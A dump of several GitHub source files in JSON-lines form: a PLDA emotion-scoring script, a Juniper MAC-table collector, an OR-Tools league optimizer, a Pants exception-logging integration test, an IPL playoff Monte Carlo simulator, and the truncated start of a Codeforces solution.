np.matmul(new_test, matrix)\n\nnew_file = open(\"output_plda\")\n\n# parameters of PLDA\nmean = None\nV = []\ncovar = None\n\ncount = 0\nlist_string = ''\nfor row in new_file:\n if count == 0:\n mean = list(map(float, (row[7:].split(\" \")[2:-1])))\n elif count < 202:\n list_string += row\n elif count == 202:\n for x in list_string.split(\" \"):\n if x != '\\n' and x and x != ']\\n' and x != '[\\n':\n V.append(float(x))\n covar = list(map(float, (row.split(\" \")[2:-1])))\n count += 1\n\nmean = np.array(mean, dtype=np.float64)\nV = np.array(V, dtype=np.float64)\nV = np.reshape(V, (200, 200))\ncovar = np.diag(covar)\n\ncorrect = 0\ntotal = 0\n# loop through tests\nfor i in range(len(new_test)):\n # actual label\n actual = new_test_labels[i]\n scores = []\n # do a multisession scoring for each class\n # http://faculty.iitmandi.ac.in/~padman/papers/padman_ivecAvgPLDA_DSP_2014.pdf\n for j in range(5):\n if j == 0:\n scores.append(log_likelihood(ad_val, mean, V, covar, new_test[i]))\n elif j == 1:\n scores.append(log_likelihood(h_val, mean, V, covar, new_test[i]))\n elif j == 2:\n scores.append(log_likelihood(s_val, mean, V, covar, new_test[i]))\n elif j == 3:\n scores.append(log_likelihood(n_val, mean, V, covar, new_test[i]))\n elif j == 4:\n scores.append(log_likelihood(fs_val, mean, V, covar, new_test[i]))\n if actual == scores.index(max(scores)):\n correct += 1\n total += 1\n\nprint(correct/total)","repo_name":"jessicah25/emotion-detection","sub_path":"scoring_plda.py","file_name":"scoring_plda.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"358533088","text":"\"\"\"\r\nMAC address table information for Juniper devices\r\n\r\nNOTE: This only returns dummy data at the moment\r\n\r\nModules:\r\n 3rd Party: traceback\r\n Internal: netconf\r\n\r\nClasses:\r\n\r\n Mac\r\n Collect MAC address table information from Juniper devices\r\n\r\nFunctions\r\n\r\n mac_table\r\n Collect MAC address table information from Juniper devices\r\n\r\nExceptions:\r\n\r\n None\r\n\r\nMisc Variables:\r\n\r\n TBA\r\n\r\nAuthor:\r\n Luke Robertson - May 2023\r\n\"\"\"\r\n\r\n\r\nimport traceback as tb\r\n\r\nimport netconf\r\n\r\n\r\nclass Mac:\r\n \"\"\"\r\n Connect to a Junos device and collect information\r\n\r\n Supports being instantiated with the 'with' statement\r\n\r\n Attributes\r\n ----------\r\n host : str\r\n IP address or FQDN of the device to connect to\r\n user : str\r\n Username to connect with\r\n password : str\r\n Password to connect with\r\n\r\n Methods\r\n -------\r\n __init__(host, user, password)\r\n Class constructor\r\n __enter__()\r\n Called when the 'with' statement is used\r\n __exit__(exc_type, exc_value, traceback)\r\n Called when the 'with' statement is finished\r\n mac()\r\n Collect MAC address table information from Juniper devices\r\n \"\"\"\r\n\r\n def __init__(self, host, user, password):\r\n \"\"\"\r\n Class constructor\r\n\r\n Parameters\r\n ----------\r\n host : str\r\n IP address or FQDN of the device to connect to\r\n user : str\r\n Username to connect with\r\n password : str\r\n Password to connect with\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n\r\n # Authentication information\r\n self.host = host\r\n self.user = user\r\n self.password = password\r\n\r\n # Device information\r\n self.mac_table = None\r\n\r\n def __enter__(self):\r\n \"\"\"\r\n Called when the 'with' statement is used\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n self\r\n The instantiated object\r\n \"\"\"\r\n\r\n # Connect to device, collect facts, license, and config\r\n with netconf.Netconf(\r\n host=self.host,\r\n user=self.user,\r\n password=self.password\r\n ) as connection:\r\n # If there was a failure to connect, return\r\n if connection.dev is None:\r\n return\r\n\r\n # Collect MAC address table information\r\n self.mac_table = connection.rpc_commands(\r\n 'get-ethernet-switching-table-information'\r\n )\r\n\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_value, traceback):\r\n \"\"\"\r\n Called when the 'with' statement is finished\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n self\r\n None\r\n \"\"\"\r\n\r\n # handle errors that were raised\r\n if exc_type:\r\n print(\r\n f\"Exception of type {exc_type.__name__} occurred: {exc_value}\"\r\n )\r\n if traceback:\r\n print(\"Traceback:\")\r\n print(tb.format_tb(traceback))\r\n\r\n def mac(self):\r\n \"\"\"\r\n Collect MAC address table information from Juniper devices\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n my_dict : dict\r\n Dictionary containing information\r\n \"\"\"\r\n\r\n my_dict = {\r\n \"entry\": []\r\n }\r\n\r\n # Handle newer and older versions of Junos\r\n # Newer versions have a different structure\r\n if 'l2ng-l2ald-rtb-macdb' in self.mac_table:\r\n\r\n # Get the MAC address table, if one exists\r\n # Routers don't have MAC address table entries, only ARP\r\n if self.mac_table['l2ng-l2ald-rtb-macdb'] is not None:\r\n mac_table = (\r\n self.mac_table\r\n ['l2ng-l2ald-rtb-macdb']\r\n ['l2ng-l2ald-mac-entry-vlan']\r\n ['l2ng-mac-entry']\r\n )\r\n\r\n # Loop through the MAC address table and add to the dictionary\r\n for address in mac_table:\r\n entry = {}\r\n entry['mac'] = address['l2ng-l2-mac-address']\r\n entry['vlan'] = address['l2ng-l2-mac-vlan-name']\r\n entry['interface'] = (\r\n address['l2ng-l2-mac-logical-interface']\r\n )\r\n my_dict['entry'].append(entry)\r\n\r\n # Older versions have a different structure\r\n elif 'ethernet-switching-table-information' in self.mac_table:\r\n mac_table = (\r\n self.mac_table\r\n ['ethernet-switching-table-information']\r\n ['ethernet-switching-table']\r\n ['mac-table-entry']\r\n )\r\n\r\n # Loop through the MAC address table and add to the dictionary\r\n for address in mac_table:\r\n entry = {}\r\n entry['mac'] = address['mac-address']\r\n entry['vlan'] = address['mac-vlan']\r\n entry['interface'] = (\r\n address['mac-interfaces-list']['mac-interfaces']\r\n )\r\n my_dict['entry'].append(entry)\r\n\r\n return my_dict\r\n\r\n\r\n# Handle running as a script\r\nif __name__ == '__main__':\r\n print('This module is not designed to be run as a script')\r\n print('Please run junos.py instead')\r\n","repo_name":"Timbertighe/NetAPI-Junos","sub_path":"mac.py","file_name":"mac.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22361748548","text":"from ortools.linear_solver import pywraplp\nimport pandas as pd\n\n\nclass SportsLeagueOpti:\n def __init__(self, n, k):\n self.n = n\n self.teams = [i + 1 for i in range(n)]\n self.k = k\n self.solver = pywraplp.Solver.CreateSolver('SAT')\n self.x, self.y, self.z, self.w, self.p = {}, {}, {}, {}, {}\n self.M = 1e5\n\n def define_variables(self):\n # Define x, y, z\n for i in self.teams:\n for j in self.teams:\n if i == j:\n continue\n self.x[i, j] = self.solver.IntVar(0, 1, f'x_{i}_{j}')\n self.y[i, j] = self.solver.IntVar(0, 1, f'y_{i}_{j}')\n self.z[i, j] = self.solver.IntVar(0, 1, f'z_{i}_{j}')\n\n # Define w\n for j in self.teams:\n if j == 1:\n continue\n self.w[j] = self.solver.IntVar(0, 1, f'w_{j}')\n\n # Define p\n for i in self.teams:\n self.p[i] = self.solver.IntVar(0, 3 * 2 * (self.n - 1), 'p')\n\n def define_constraints(self):\n # Constrain x, y, z\n for i in self.teams:\n for j in self.teams:\n if i == j:\n continue\n self.solver.Add(self.x[i, j] + self.y[i, j] + self.z[i, j] == 1)\n\n # Link p and x, y, z\n for i in self.teams:\n self.solver.Add(\n self.p[i] == sum(3 * self.x[i, j] + self.y[i, j] + self.y[j, i] + 3 * self.z[j, i]\n for j in self.teams if i != j)\n )\n\n # Constrain w\n self.solver.Add(sum(self.w[j] for j in self.teams if j != 1) == self.k - 1)\n\n # Link p and w\n for j in self.teams:\n if j == 1:\n continue\n self.solver.Add(self.p[j] <= self.p[1] + self.M * (1 - self.w[j]))\n self.solver.Add(self.p[1] <= self.p[j] + self.M * (self.w[j]))\n\n def define_objective(self):\n self.solver.Maximize(self.p[1])\n\n def solve_and_report(self):\n status = self.solver.Solve()\n if status == pywraplp.Solver.OPTIMAL:\n print('Objective value =', self.solver.Objective().Value())\n print('Problem solved in %f milliseconds' % self.solver.wall_time())\n print('Problem solved in %d iterations' % self.solver.iterations())\n print('Problem solved in %d branch-and-bound nodes' % self.solver.nodes())\n else:\n print('The problem does not have an optimal solution.')\n\n league = [\n (self.p[i].solution_value(), i,\n sum(self.x[i, j].solution_value() + self.z[j, i].solution_value() for j in self.teams if i != j),\n sum(self.y[i, j].solution_value() + self.y[j, i].solution_value() for j in self.teams if i != j),\n sum(self.z[i, j].solution_value() + self.x[j, i].solution_value() for j in self.teams if i != j))\n for i in self.teams\n ]\n # Build the league table as dataframe\n df = pd.DataFrame(league, columns=['points', 'team', 'wins', 'draws', 'losses'])\n df['team'] = df['team'].astype(int)\n df['wins'] = df['wins'].astype(int)\n df['draws'] = df['draws'].astype(int)\n df['losses'] = df['losses'].astype(int)\n df = df.sort_values(by=['points', 'wins', 'draws', 'losses'], ascending=False)\n df = df.reset_index(drop=True)\n print('\\nLeague table:')\n print(df)\n\n def run(self):\n self.define_variables()\n self.define_constraints()\n self.define_objective()\n self.solve_and_report()\n\n\nif __name__ == '__main__':\n sports_league = SportsLeagueOpti(18, 3)\n sports_league.run()\n","repo_name":"jsalva9/K-MST-with-MILP-optimization","sub_path":"problems/sports_league.py","file_name":"sports_league.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765845659","text":"import os\nimport signal\nimport time\nfrom textwrap import dedent\n\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exception_sink import ExceptionSink\nfrom pants.util.contextutil import environment_as, temporary_dir\nfrom pants.util.dirutil import read_file\nfrom pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase\n\n\nclass ExceptionSinkIntegrationTest(PantsDaemonIntegrationTestBase):\n def _assert_unhandled_exception_log_matches(self, pid, file_contents):\n self.assertRegex(\n file_contents,\n \"\"\"\\\ntimestamp: ([^\\n]+)\nprocess title: ([^\\n]+)\nsys\\\\.argv: ([^\\n]+)\npid: {pid}\nException caught: \\\\([^)]*\\\\)\n(.|\\n)*\n\nException message:.* 1 Exception encountered:\n\n ResolveError: \"this-target-does-not-exist\" was not found in namespace \"\"\\\\. Did you mean one of:\n\"\"\".format(\n pid=pid\n ),\n )\n # Ensure we write all output such as stderr and reporting files before closing any streams.\n self.assertNotIn(\"Exception message: I/O operation on closed file.\", file_contents)\n\n def _get_log_file_paths(self, workdir, pid):\n pid_specific_log_file = ExceptionSink.exceptions_log_path(for_pid=pid, in_dir=workdir)\n self.assertTrue(os.path.isfile(pid_specific_log_file))\n\n shared_log_file = ExceptionSink.exceptions_log_path(in_dir=workdir)\n self.assertTrue(os.path.isfile(shared_log_file))\n\n self.assertNotEqual(pid_specific_log_file, shared_log_file)\n\n return (pid_specific_log_file, shared_log_file)\n\n def test_fails_ctrl_c_ffi_extern(self):\n with temporary_dir() as tmpdir:\n with environment_as(_RAISE_KEYBOARDINTERRUPT_IN_EXTERNS=\"True\"):\n pants_run = self.run_pants_with_workdir(\n self._lifecycle_stub_cmdline(), workdir=tmpdir\n )\n self.assert_failure(pants_run)\n\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n pants_run.stderr_data,\n )\n\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(\n tmpdir, pants_run.pid\n )\n\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n read_file(pid_specific_log_file),\n )\n self.assertIn(\n \"KeyboardInterrupt: ctrl-c interrupted execution of a ffi method!\",\n read_file(shared_log_file),\n )\n\n def test_fails_ctrl_c_on_import(self):\n with temporary_dir() as tmpdir:\n with environment_as(_RAISE_KEYBOARDINTERRUPT_ON_IMPORT=\"True\"):\n # TODO: figure out the cwd of the pants subprocess, not just the \"workdir\"!\n pants_run = self.run_pants_with_workdir(\n self._lifecycle_stub_cmdline(), workdir=tmpdir\n )\n self.assert_failure(pants_run)\n\n self.assertIn(\n dedent(\n \"\"\"\\\n Interrupted by user:\n ctrl-c during import!\n \"\"\"\n ),\n pants_run.stderr_data,\n )\n\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(\n tmpdir, pants_run.pid\n )\n\n self.assertEqual(\"\", read_file(pid_specific_log_file))\n self.assertEqual(\"\", read_file(shared_log_file))\n\n def test_logs_unhandled_exception(self):\n with temporary_dir() as tmpdir:\n pants_run = self.run_pants_with_workdir(\n [\"--no-enable-pantsd\", \"list\", \"//:this-target-does-not-exist\"],\n workdir=tmpdir,\n # The backtrace should be omitted when --print-exception-stacktrace=False.\n print_exception_stacktrace=False,\n )\n self.assert_failure(pants_run)\n self.assertRegex(\n pants_run.stderr_data,\n \"\"\"\\\n\"this-target-does-not-exist\" was not found in namespace \"\"\\\\. Did you mean one of:\n\"\"\",\n )\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(tmpdir, pants_run.pid)\n self._assert_unhandled_exception_log_matches(\n pants_run.pid, read_file(pid_specific_log_file)\n )\n self._assert_unhandled_exception_log_matches(pants_run.pid, read_file(shared_log_file))\n\n def _assert_graceful_signal_log_matches(self, pid, signum, signame, contents):\n self.assertRegex(\n contents,\n \"\"\"\\\ntimestamp: ([^\\n]+)\nprocess title: ([^\\n]+)\nsys\\\\.argv: ([^\\n]+)\npid: {pid}\nSignal {signum} \\\\({signame}\\\\) was raised\\\\. Exiting with failure\\\\.\n\"\"\".format(\n pid=pid, signum=signum, signame=signame\n ),\n )\n # Ensure we write all output such as stderr and reporting files before closing any streams.\n self.assertNotIn(\"Exception message: I/O operation on closed file.\", contents)\n\n def test_dumps_logs_on_signal(self):\n \"\"\"Send signals which are handled, but don't get converted into a KeyboardInterrupt.\"\"\"\n signal_names = {\n signal.SIGQUIT: \"SIGQUIT\",\n signal.SIGTERM: \"SIGTERM\",\n }\n for (signum, signame) in signal_names.items():\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signum)\n\n time.sleep(5)\n\n # Check that the logs show a graceful exit by signal.\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(ctx.workdir, pid)\n self._assert_graceful_signal_log_matches(\n pid, signum, signame, read_file(pid_specific_log_file)\n )\n self._assert_graceful_signal_log_matches(\n pid, signum, signame, read_file(shared_log_file)\n )\n\n def test_dumps_traceback_on_sigabrt(self):\n # SIGABRT sends a traceback to the log file for the current process thanks to\n # faulthandler.enable().\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signal.SIGABRT)\n\n time.sleep(5)\n\n # Check that the logs show an abort signal and the beginning of a traceback.\n pid_specific_log_file, shared_log_file = self._get_log_file_paths(ctx.workdir, pid)\n self.assertRegex(\n read_file(pid_specific_log_file),\n \"\"\"\\\nFatal Python error: Aborted\n\nThread [^\\n]+ \\\\(most recent call first\\\\):\n\"\"\",\n )\n # faulthandler.enable() only allows use of a single logging file at once for fatal tracebacks.\n self.assertEqual(\"\", read_file(shared_log_file))\n\n def test_prints_traceback_on_sigusr2(self):\n with self.pantsd_successful_run_context() as ctx:\n ctx.runner([\"help\"])\n pid = ctx.checker.assert_started()\n os.kill(pid, signal.SIGUSR2)\n\n time.sleep(5)\n\n ctx.checker.assert_running()\n self.assertRegex(\n read_file(os.path.join(ctx.workdir, \"pantsd\", \"pantsd.log\")),\n \"\"\"\\\nCurrent thread [^\\n]+ \\\\(most recent call first\\\\):\n\"\"\",\n )\n\n def _lifecycle_stub_cmdline(self):\n # Load the testprojects pants-plugins to get some testing tasks and subsystems.\n testproject_backend_src_dir = os.path.join(\n get_buildroot(), \"testprojects/pants-plugins/src/python\"\n )\n testproject_backend_pkg_name = \"test_pants_plugin\"\n lifecycle_stub_cmdline = [\n \"--no-enable-pantsd\",\n f\"--pythonpath=+['{testproject_backend_src_dir}']\",\n f\"--backend-packages=+['{testproject_backend_pkg_name}']\",\n # This task will always raise an exception.\n \"lifecycle-stub-goal\",\n ]\n\n return lifecycle_stub_cmdline\n","repo_name":"mgrenonville/pants","sub_path":"tests/python/pants_test/base/test_exception_sink_integration.py","file_name":"test_exception_sink_integration.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"9350592461","text":"from multiprocessing import Pool\nfrom datetime import *\nfrom enum import *\nimport operator\nimport copy\nimport pprint\nimport re\nfrom secrets import randbelow\n\nMAX_FIXTURE = 56\nCURRENT_MATCH = 25\nENABLE_CONSOLE_LOG = False\n\nmatches_left = MAX_FIXTURE - CURRENT_MATCH + 1\ncurrent_match_index = CURRENT_MATCH\ntotal_simulations = pow(2, matches_left)\ntotal_batches = pow(10, 6)\nprogress_percent = total_batches / 100\nbatch_size = max(total_simulations, round(total_simulations / total_batches))\n\nmonte_carlo_simulations = pow(10, 4)\nmonte_carlo_batch = 100\ntotal_monte_carlo_simulations = monte_carlo_simulations * monte_carlo_batch\npp = pprint.PrettyPrinter(indent=4)\n\n\nclass Key:\n GUARANTEED_TOP2 = \"guaranteed2\"\n GUARANTEED_TOP4 = \"guaranteed4\"\n NRR_TOP2 = \"nrr2\"\n NRR_TOP4 = \"nrr4\"\n\n\nclass Team:\n CSK = \"CSK\"\n SRH = \"SRH\"\n RCB = \"RCB\"\n MI = \"MI\"\n KXIP = \"KXIP\"\n DC = \"DC\"\n KKR = \"KKR\"\n RR = \"RR\"\n\n list = [CSK, SRH, RCB, MI, KXIP, DC, KKR, RR]\n\n\nclass Constants:\n # MAX_FIXTURE = 56\n\n points = {Team.CSK: 10,\n Team.SRH: 6,\n Team.RCB: 0,\n Team.MI: 8,\n Team.KXIP: 8,\n Team.DC: 6,\n Team.KKR: 8,\n Team.RR: 2}\n\n nrr = {Team.CSK: 0.220,\n Team.SRH: 0.28,\n Team.RCB: 0.129,\n Team.MI: 0.32,\n Team.KXIP: -0.490,\n Team.DC: -0.22,\n Team.KKR: -0.07,\n Team.RR: -0.246}\n\n adjusted_points = {}\n\n def __init__(self):\n self.reset_adjusted_points()\n\n def reset_adjusted_points(self):\n for team in self.points.keys():\n self.adjusted_points[team] = self.points[team] + self.nrr[team] / 100\n\n fixture = {\n 23: (Team.CSK, Team.KKR),\n 24: (Team.MI, Team.KXIP),\n 25: (Team.RR, Team.CSK),\n 26: (Team.KKR, Team.DC),\n 27: (Team.MI, Team.RR),\n 28: (Team.KXIP, Team.RCB),\n 29: (Team.KKR, Team.CSK),\n 30: (Team.SRH, Team.DC),\n 31: (Team.MI, Team.RCB),\n 32: (Team.KXIP, Team.RR),\n 33: (Team.SRH, Team.CSK),\n 34: (Team.DC, Team.MI),\n 35: (Team.KKR, Team.RCB),\n 36: (Team.RR, Team.MI),\n 37: (Team.DC, Team.KXIP),\n 38: (Team.SRH, Team.KKR),\n 39: (Team.RCB, Team.CSK),\n 40: (Team.RR, Team.DC),\n 41: (Team.CSK, Team.SRH),\n 42: (Team.RCB, Team.KXIP),\n 43: (Team.KKR, Team.RR),\n 44: (Team.CSK, Team.MI),\n 45: (Team.RR, Team.SRH),\n 46: (Team.DC, Team.RCB),\n 47: (Team.KKR, Team.MI),\n 48: (Team.SRH, Team.KXIP),\n 49: (Team.RCB, Team.RR),\n 50: (Team.CSK, Team.DC),\n 51: (Team.MI, Team.SRH),\n 52: (Team.KXIP, Team.KKR),\n 53: (Team.DC, Team.RR),\n 54: (Team.RCB, Team.SRH),\n 55: (Team.KXIP, Team.CSK),\n 56: (Team.MI, Team.KKR)\n }\n\n\ndef play():\n b = list(range(total_batches))\n p = Pool(8, )\n print(\"Total sim = \", \"{:,}\".format(total_simulations))\n console_log(\"started\")\n results = p.map(simulate, b)\n print(\"\\n\")\n console_log(\"reducing ...\")\n f = reduce(results)\n pp.pprint(f)\n console_log(\"ended\")\n\n\ndef pool_initializer():\n global current_match_index\n\n\ndef play_montecarlo():\n global current_match_index\n b = list(range(monte_carlo_batch))\n p = Pool(8, pool_initializer)\n console_log(\"Total sim = \", \"{:,}\".format(total_monte_carlo_simulations))\n console_log(\"started\")\n results = p.map(simulate_monte_carlo, b)\n print(\"\\n\")\n console_log(\"reducing ...\")\n cur_result = reduce(results)\n print(\n f\"\\nMonte Carlo probability **after match {CURRENT_MATCH - 1} : {Constants.fixture[CURRENT_MATCH-1][0]} vs {Constants.fixture[CURRENT_MATCH-1][1]}**\\n\")\n output_table(total_monte_carlo_simulations, cur_result, use_elimination=False)\n\n team1, team2 = Constants.fixture[CURRENT_MATCH]\n current_match_index = CURRENT_MATCH + 1\n print(f\"\\n\\n \\n\\nIf **{team1}** wins match {CURRENT_MATCH} {team1} vs {team2} : \")\n Constants.points[team1] += 2\n p = Pool(8, pool_initializer)\n team1_result = reduce(p.map(simulate_monte_carlo, b))\n output_table(total_monte_carlo_simulations, team1_result, use_elimination=False)\n Constants.points[team1] -= 2\n\n print(f\"\\n\\n \\n\\nIf **{team2}** wins match {CURRENT_MATCH} {team1} vs {team2} : \")\n Constants.points[team2] += 2\n p = Pool(8, pool_initializer)\n team2_result = reduce(p.map(simulate_monte_carlo, b))\n output_table(total_monte_carlo_simulations, team2_result, use_elimination=False)\n Constants.points[team2] -= 2\n current_match_index = CURRENT_MATCH\n\n print(\"\\n\\n \\n\\n^(**Notes:**)\")\n print(\n \"\\n\\n^(1.**Monte Carlo** - this is NOT accurate. This is how it works - it picks a match, flips a coin and decides the winner. Repeat till the end of all the league matches. Figure out who qualified. Repeat the whole process for a large number of times and get the %.)\")\n print(\n \"\\n\\n^(2.Why is there a range of percentage: its because of NRR situation. For eg 80-90% means 80% of the time, the team can qualify without involving NRR. 90% if the team has top NRR. Somewhere in between if the NRR is mediocre)\")\n print(\"\\n\\n\\n\")\n\n # pp.pprint(cur_result)\n console_log(\"ended\")\n\n\ndef output_table(total, results, match_offset=None, highlight_team=None, use_elimination=True):\n if match_offset is None:\n match_offset = current_match_index\n header = \"Team | Pt | ^(Matches Left) | ^(Top 4) | ^(Top 2)\"\n print(\"\\n\\n\" + header)\n print(get_header_dashes(header))\n\n sorting_table = {}\n for team in Team.list:\n sorting_table.setdefault(team, (results[Key.GUARANTEED_TOP4][team],\n results[Key.NRR_TOP4][team],\n results[Key.GUARANTEED_TOP2][team],\n results[Key.NRR_TOP2][team]))\n\n sorted_table = sorted(sorting_table.items(), key=lambda x: (x[1][0], x[1][1], x[1][2], x[1][3]), reverse=True)\n for qt in sorted_table:\n team = qt[0]\n team_txt = team if team != highlight_team else \"**\" + team + \"**\"\n top4 = f\"{get_percentage(results[Key.GUARANTEED_TOP4][team], total)}-{get_percentage(results[Key.NRR_TOP4][team], total)}%\"\n top2 = f\"{get_percentage(results[Key.GUARANTEED_TOP2][team], total)}-{get_percentage(results[Key.NRR_TOP2][team], total)}%\"\n eliminated = \"~~\" if use_elimination and sum([results[Key.GUARANTEED_TOP4][team], results[Key.NRR_TOP4][team],\n results[Key.GUARANTEED_TOP2][team], results[Key.NRR_TOP2][team]]) == 0 else \"\"\n print(f\"{eliminated}{team_txt}{eliminated} | \"\n f\"{eliminated}{Constants.points[team]}{eliminated} | \"\n f\"{get_remaining_match_count(team, match_offset)} | \"\n f\"{eliminated}{top4}{eliminated} | \"\n f\"{eliminated}{top2}{eliminated} | \"\n )\n print(\"\\nTotal Simulations : \", \"{:,}\".format(total), \"\\n\")\n\n\ndef get_percentage(x, total_counter):\n percent = round(100 * x / total_counter)\n if percent == 100 and x != total_counter or percent == 0 and x != 0:\n percent = round(100 * x / total_counter, 2)\n return percent\n\n\ndef get_remaining_match_count(team, start_from=CURRENT_MATCH):\n count = 0\n for i in range(start_from, 57):\n match = Constants.fixture[i]\n if match[0] == team or match[1] == team:\n count += 1\n return count\n\n\ndef console_log(*args):\n if not ENABLE_CONSOLE_LOG:\n return\n print(datetime.now(), \"\\t\", end=\"\")\n for a in args:\n print(a, end=\" \")\n print(\"\\n\")\n\n\ndef reduce(results):\n final = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n for r in results:\n if r is None: continue\n for k in [Key.GUARANTEED_TOP2, Key.GUARANTEED_TOP4, Key.NRR_TOP2, Key.NRR_TOP4]:\n for team in Team.list:\n final[k][team] += r[k][team]\n return final\n\n\ndef simulate(batch_no):\n global current_match_index\n if ENABLE_CONSOLE_LOG and batch_no % progress_percent == 0:\n print(\"\\r\", round(100 * batch_no / total_batches), \"%\", end=' ', flush=True)\n\n result = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n start = batch_no * batch_size\n end = min(start + batch_size, total_simulations)\n if start >= end:\n return None\n for i in range(start, end):\n points = copy.deepcopy(Constants.points)\n for j in range(matches_left):\n match_index = current_match_index + j\n winner_binary_index = randbelow(2)\n winner = Constants.fixture[match_index][winner_binary_index]\n points[winner] += 2\n evaluate_combo(result, points)\n\n return result\n\n\ndef simulate_monte_carlo(batch_no):\n if ENABLE_CONSOLE_LOG:\n print(\"\\r\", round(100 * batch_no / monte_carlo_batch), \"%\", end=' ', flush=True)\n\n result = {\n Key.GUARANTEED_TOP2: get_team_init_counter(),\n Key.GUARANTEED_TOP4: get_team_init_counter(),\n Key.NRR_TOP2: get_team_init_counter(),\n Key.NRR_TOP4: get_team_init_counter()\n }\n for i in range(monte_carlo_simulations):\n points = copy.deepcopy(Constants.points)\n for match_index in range(current_match_index, matches_left):\n winner_binary_index = randbelow(2)\n winner = Constants.fixture[match_index][winner_binary_index]\n points[winner] += 2\n evaluate_combo(result, points)\n\n return result\n\n\ndef get_team_init_counter():\n return {Team.CSK: 0,\n Team.SRH: 0,\n Team.RCB: 0,\n Team.MI: 0,\n Team.KXIP: 0,\n Team.DC: 0,\n Team.KKR: 0,\n Team.RR: 0}\n\n\n#\ndef evaluate_combo(result, points, log_non_qualifying_team=None):\n # # global c\n # # global total_counter\n # self.total_counter += 1\n # points_chain = copy.deepcopy(self.c.points)\n # adjusted_points_chain = copy.deepcopy(self.c.adjusted_points)\n #\n # for winner in chain:\n # points_chain[winner] += 2\n # adjusted_points_chain[winner] += 2\n #\n # if self.log_all_combo:\n # self.log_scenario(chain, points_chain)\n #\n # # evaluate top 4\n sorted_points_chain = sorted(points.items(), key=operator.itemgetter(1), reverse=True)\n # # qualifying with NRR : keep adding to bucket top 4 items, then add any other matching #4's score\n # # qualifying without NRR : add if points\n\n fourth_team_point = sorted_points_chain[3][1]\n second_team_point = sorted_points_chain[1][1]\n qualifying_without_nrr = []\n qualifying_without_nrr_candidate = []\n qualifying_top2_without_nrr = []\n qualifying_top2_without_nrr_candidate = []\n # not_qual_nrr = {}\n\n for i in range(0, len(sorted_points_chain)):\n team = sorted_points_chain[i][0]\n point = sorted_points_chain[i][1]\n # qualifying with NRR : teams 1-4, plus any team tieing with 4\n if i < 4 or point == fourth_team_point:\n result[Key.NRR_TOP4][team] += 1\n if i < 2 or point == second_team_point:\n result[Key.NRR_TOP2][team] += 1\n # else:\n # not_qual_nrr[team] = 1\n # qualifying without NRR:\n # if point > 4th team point, then add to qualifying bucket\n # if point = 4th team point then add to candidate bucket\n if point > fourth_team_point:\n qualifying_without_nrr.append(team)\n elif point == fourth_team_point:\n qualifying_without_nrr_candidate.append(team)\n\n if point > second_team_point:\n qualifying_top2_without_nrr.append(team)\n elif point == second_team_point:\n qualifying_top2_without_nrr_candidate.append(team)\n\n # if qualifying + candidate = 4 then add, else discard candidate\n if len(qualifying_without_nrr) + len(qualifying_without_nrr_candidate) == 4:\n qualifying_without_nrr += qualifying_without_nrr_candidate\n for team in qualifying_without_nrr:\n result[Key.GUARANTEED_TOP4][team] += 1\n\n if len(qualifying_top2_without_nrr) + len(qualifying_top2_without_nrr_candidate) == 2:\n qualifying_top2_without_nrr += qualifying_top2_without_nrr_candidate\n for team in qualifying_top2_without_nrr:\n result[Key.GUARANTEED_TOP2][team] += 1\n\n # if log_non_qualifying_team is not None and log_non_qualifying_team not in qualifying_without_nrr:\n # self.log_non_qualifying_scenario(chain, points_chain)\n\n # using current NRR as trend\n # sorted_adjusted_points_chain = sorted(adjusted_points_chain.items(), key=operator.itemgetter(1), reverse=True)\n # for t in sorted_adjusted_points_chain[:4]:\n # self.qualify_with_current_nrr_counter[t[0]] += 1\n # if t[0] in not_qual_nrr:\n # self.log_scenario(chain, points_chain)\n\n\ndef get_header_dashes(txt):\n return re.sub(\"[^|]\", \"-\", txt)\n\n\n#\n#\n# if __name__ == '__main__':\n#\n# t1 = datetime.now()\n# for i in range(1000000000):\n# a = 1\n# t2 = datetime.now()\n#\n# print(\"Elapsed = \", t2 - t1)\n\n# play()\nplay_montecarlo()\n","repo_name":"ammachan/ipl","sub_path":"ipl3.py","file_name":"ipl3.py","file_ext":"py","file_size_in_byte":13424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28484169714","text":"# https://codeforces.com/gym/421768/problem/B\n\nn, d = [int(i) for i in input().split()]\npower = sorted(int(i) for i in input().split())\n\nrep = n - 1\nfol = 0\nwins = 0\n\nwhile fol <= 